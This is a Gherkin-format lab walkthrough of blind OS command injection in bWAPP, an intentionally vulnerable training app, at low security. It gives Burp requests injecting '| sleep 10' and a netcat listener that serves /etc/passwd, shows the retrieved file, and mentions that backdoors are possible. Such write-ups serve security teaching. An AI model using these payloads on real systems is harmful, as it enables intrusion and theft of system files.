# language: en

Feature: OS Command Injection - Blind
  From system bWAPP
  From the A1 - Injection category
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given a description of the vulnerability + input form
  """
  URL: http://localhost/bWAPP/commandi_blind.php
  Message: OS command injection - Blind
  Input form:
            - Enter your ip address <text>
            - Submit button
  Objective: Inject UNIX commands via web application
  """

Scenario: OS command Injection - Blind
Blind command injection is quite closer to the standard
OS command injection, although in this case, commands
suplied get interpreted but there is no response with
the output.
  Given the vulnerable form
  """
  # Vulnerable form html
    <label for="target">Enter your IP address:</label>
    <input type="text" id="target" name="target" value="">
    <button type="submit" name="form" value="submit">PING</button>
  """
  When I submit a random value or ip
  Then the following output is displayed
  """
  # Output
  Did you captured our GOLDEN packet?
  """
  Then I submit try to pipe it with another command
  """
  # Burp Request
  POST /bWAPP/commandi_blind.php HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 35
  target=192+%7C+sleep+10&form=submit

  %7C = | ; Command: 192 | sleep 10
  """
  Then I see it takes 10 seconds more to get the response
  When I check the source code of the url site
  """
  # commandi_blind.php
  shell_exec("ping -c 1 " . commandi($target));
  """
  Then I see there is no way to leak information throug this form
  But there it must be a way...

Scenario: Blind Explotaition
Although there is no easy way to leak information,
it all relies on UNIX per se, and the fact that
the application function shell_exec runs with
the privileges of the www-data user, still better
than a regular user privileges.

  Given the vulnerable form
  When I craft the following with netcat
  """
  # UNIX craft commands
  nc -l -p 8666 < /etc/passwd
  -l: listen mode
  -p {port}: port
  < /etc/passwd: Redirect output to open port
  """
  Then I submit the command in the burp request
  """
  # Burp request
  POST /bWAPP/commandi_blind.php HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Content-Length: 52
  target=192 | nc -l -p 8666 < /etc/passwd&form=submit
  """
  Then I fire up a terminal
  And I connect to that port with netcat
  """
  # Connecting to remote port
  skhorn@Morgul ~a1-command-injection-blind> nc 192.168.56.101 8666
  """
  Then I see the following output
  """
  # Command output
  skhorn@Morgul ~a1-command-injection-blind> nc 192.168.56.101 8666
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  bin:x:2:2:bin:/bin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/bin/sh
  man:x:6:12:man:/var/cache/man:/bin/sh
  lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  mail:x:8:8:mail:/var/mail:/bin/sh
  news:x:9:9:news:/var/spool/news:/bin/sh
  uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  proxy:x:13:13:proxy:/bin:/bin/sh
  www-data:x:33:33:www-data:/var/www:/bin/sh
  backup:x:34:34:backup:/var/backups:/bin/sh
  """
  And any command can be included to leave a backdoor or leak more data
